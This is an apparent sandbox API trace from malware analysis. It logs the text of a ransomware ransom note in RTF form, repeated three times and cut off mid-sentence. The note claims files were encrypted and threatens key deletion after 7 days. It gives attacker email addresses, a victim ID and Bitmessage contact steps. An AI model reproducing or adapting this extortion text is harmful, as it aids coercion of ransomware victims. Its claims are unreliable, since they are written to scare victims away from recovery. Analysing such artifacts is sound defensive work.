CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.988] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.988] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w 